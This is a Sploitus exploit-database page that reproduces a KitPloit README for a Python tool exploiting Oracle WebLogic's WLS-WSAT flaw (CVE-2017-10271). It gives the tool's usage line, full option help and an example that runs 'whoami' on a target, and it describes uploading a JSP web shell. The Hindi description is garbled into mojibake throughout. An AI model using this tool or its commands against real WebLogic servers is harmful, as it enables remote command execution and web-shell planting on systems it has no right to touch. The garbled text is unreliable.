Sploitus

Exploit for CVE-2017-10271

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AL1EX-CVE-2017-10271
#### рд╕рдВрдХреНрд╖рд┐рдкреНрдд рд╡рд┐рд╡рд░рдг

  * рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рдФрд░ рдкреНрд░рддрд┐рдзреНрд╡рдирд┐
  * рд╕реАрдзреЗ рд╢реЗрд▓ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВ
  * рд▓рд┐рдирдХреНрд╕ рдкрд░ рд╡реЗрдмрд▓реЙрдЬрд┐рдХ 10.3.6.0 рдХреЗ рд╕рд╛рде рдкрд░реАрдХреНрд╖рдг рд╕рдлрд▓



#### рдЙрдкрдпреЛрдЧ рд╡рд┐рдзрд┐

  * python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001



root@kitploit:~
    
    
    usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL]
    
    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            weblogic ip and port(eg -> 172.16.80.131:7001)
      -c CMD, --cmd CMD     command to execute,default is "id"
      -o OUTPUT, --output OUTPUT
                            output file name,default is output.txt
      -s SHELL, --shell SHELL
                            local jsp file name to upload,and set -o xxx.jsp
    

рдЙрджрд╛рд╣рд░рдгя╝Ъ

root@kitploit:~
    
    
    python2 weblogic_wls_wsat_exp_win.py -t 192.168.174.144:7001 -c "whoami"
    

![рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ](https://assets.kitploit.com/production/public/readmes/15079/f9a5ccc5469a3a65b4c8a63c5ab9725047f94fcdf05e7f3578cd26f031ead434.png)